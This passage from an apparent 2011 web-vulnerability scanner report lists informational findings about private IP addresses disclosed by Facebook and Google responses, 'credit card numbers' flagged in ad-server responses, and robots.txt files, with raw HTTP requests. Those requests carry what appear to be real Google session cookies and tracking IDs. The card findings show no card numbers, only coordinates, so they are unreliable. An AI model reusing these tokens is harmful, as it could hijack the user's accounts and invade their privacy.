Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.147.35
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26128

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.74. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17d68faa%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Ffrances-bay-grandma-happy-gilmore-adam-sandler-dead-died-happy-days-canadian-canada%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10T3wZzE.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.248.47
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26123

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.75. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1847eea5c%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Ftmz-live-nancy-grace-guest-dancing-with-the-stars-casey-anthony-jurors-michael-jackson-manslaughter-jose-baez%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10fMav5Y.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.22.79
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26138

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.76. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd3892b0c%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff324ad897%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=Arial&href=http%3A%2F%2Fbostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad%2Fsrvc%3Dtrack%26position%3Dalso&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track&position=also
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.148.43
X-Cnection: close
Date: Sat, 17 Sep 2011 01:02:47 GMT
Content-Length: 25234

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.77. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f90e0bb8%26origin%3Dhttp%253A%252F%252Fbgs-soft.com%252Ff3296a539c%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fbgs-soft.com%2FUsAndThem.asp&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=350 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bgs-soft.com/UsAndThem.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.42.59
X-Cnection: close
Date: Fri, 16 Sep 2011 19:47:39 GMT
Content-Length: 27027

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.78. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=374095054754&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18399f63c%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&id=205702799462197&locale=en_US&sdk=joey&show_faces=false&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.133.31
X-Cnection: close
Date: Sat, 17 Sep 2011 01:02:41 GMT
Content-Length: 9190

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

21.79. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=374095054754&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df107aa8408%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff1aa4092c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&id=205702799462197&locale=en_US&sdk=joey&show_faces=false&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.245.69
X-Cnection: close
Date: Sat, 17 Sep 2011 00:58:09 GMT
Content-Length: 9207

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

21.80. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=374095054754&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2147b80ac%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff3524c18b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&id=205702799462197&locale=en_US&sdk=joey&show_faces=false&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.8.33
X-Cnection: close
Date: Sat, 17 Sep 2011 00:58:01 GMT
Content-Length: 9196

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

21.81. http://www.google.com/sdch/sXoKgwNA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/sXoKgwNA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/sXoKgwNA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4
If-Modified-Since: Fri, 16 Sep 2011 17:18:14 GMT

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-sdch-dictionary
Last-Modified: Fri, 16 Sep 2011 18:51:27 GMT
Date: Fri, 16 Sep 2011 19:31:05 GMT
Expires: Fri, 16 Sep 2011 19:31:05 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 132040

Domain: .google.com
Path: /search

<!doctype html> <head> <title> - Google Search</title> <script>window.google={kEI:" WJ_5AKi8-ooAE",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return rwt(this,'','','','1 clk(this,this.href,'','','',' rwt(this,'','','','14','AFQjCNGl clk(this,th
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4ihYA8ZxpjMJ:www.cardomain.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+carOJ7l3PBi2ywJ:www.usedcars.com/+used+car &amp;hl=en&amp;ct=cl
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: topics.nytimes.com/top/news/business/companies/ J:explore.live.com/windows-live- &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return rwt(this,'','','','clk(this,this.hr
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.motortrend.com/new_cars/01/J:www.google.com/finance%3Fcid%3D6_AF_a1pfx4YJ:www.craigslist.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return this.hr
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:7xB4UhrmMUQJ:www.moviefone.com/+aol &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','',' clk(this,this.href,'','','',' Q')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.google.com/finance%3Fcid%3D&hl=en&ct=clnk&gl=us','','','',' &hl=en&ct=clnk&gl=us','','','',' &amp;cd= &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return rwt
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.edmunds.com/used-cars/+used+carsVsBuRBChf0J:www.carmax.com/enus/car-search/used-cars.html+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="retur
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','',' A')">
...[SNIP]...

22. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


22.1. http://assets.newsinc.com/flash/widget_toppicks01ps2.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets.newsinc.com
Path:   /flash/widget_toppicks01ps2.xml

Issue detail

The following credit card number was disclosed in the response:

Request

GET /flash/widget_toppicks01ps2.xml?v=2.7.0 HTTP/1.1
Host: assets.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503
If-None-Match: "d4fc97c509659b75278236329237887d"
If-Modified-Since: Fri, 20 May 2011 20:02:04 GMT

Response

HTTP/1.1 200 OK
x-amz-id-2: ysiLBj2SsTA0cgToOhvT3KkYvgKidVREU4xark/PpKIGsYEeABxGdDIAY6FfwpiC
x-amz-request-id: CE7BA048643D210C
Date: Sat, 17 Sep 2011 01:09:36 GMT
Cache-Control: max-age=0
Last-Modified: Fri, 20 May 2011 20:02:04 GMT
ETag: "d4fc97c509659b75278236329237887d"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 6957
Server: AmazonS3

<?xml version="1.0"?>
<gui_info>
   <resources>
       <guifile file="widget_hothmb_gui01.swf"/>
       <cssfile file="internal">
           <!--file="internal" & add internalcss element and insert CDATA css-->
           <inter
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...

22.2. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following credit card number was disclosed in the response:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A7%3A44&ranreq=0.5183736386243254&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=54474395&rk1=24255064&rk2=1316239663.519&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:18 GMT
Content-Length: 1376
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:18 GMT; path=/
Set-Cookie: pubfreq_27331_22455_2121869150=325-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:18 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...
&siteId=27331&adId=22455&adServerId=325&kefact=0.900000&kpbmtpfact=0.000000&kadNetFrequecy=2&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1316221578&indirectAdId=32818&adServerOptimizerId=1&ranreq=0.5183736386243254&defaultReq=1&defaultedAdServerId=661&kadDefNetFreq=1&imprCap=1&pageURL=http://ad.afy11.net/ad">
...[SNIP]...

23. Robots.txt file  previous  next
There are 107 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


23.1. http://2912a.v.fwmrm.net/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 2912a.v.fwmrm.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
ETag: "2619422350"
Last-Modified: Mon, 21 Apr 2008 16:10:10 GMT
Content-Length: 36
Connection: keep-alive
Date: Sat, 17 Sep 2011 01:04:35 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

# go away
User-Agent: *
Disallow: /

23.2. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.abc.com

Response

HTTP/1.0 200 OK
Content-Length: 136
Content-Type: text/plain
Last-Modified: Fri, 22 Apr 2011 20:01:15 GMT
Accept-Ranges: bytes
ETag: "80371b9281cc1:5afd"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sat, 23 Apr 2011 01:56:06 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=300
Date: Sat, 17 Sep 2011 01:02:02 GMT
Connection: close

User-agent: *
Disallow: /
User-agent: msnbot-media
Allow: /vp2/
User-agent: Googlebot
Allow: /media/_global/player/*/flash/SFP_Locke.swf

23.3. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

23.4. http://abc.go.com/shows/charlies-angels  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abc.go.com
Path:   /shows/charlies-angels

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: abc.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=180
Content-Length: 151
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 28 Apr 2010 01:00:17 GMT
Accept-Ranges: bytes
ETag: "8026a92a6ee6ca1:1a1c2"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:02:07 GMT
Date: Sat, 17 Sep 2011 01:02:00 GMT
Connection: close

User-agent: *
Disallow: /rss/
Disallow: /xml/
Disallow: /json/
Disallow: /headerxml/
Disallow: /service/
Disallow: /vp2/

User-Agent: MJ12bot
Disallow:

23.5. http://action.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
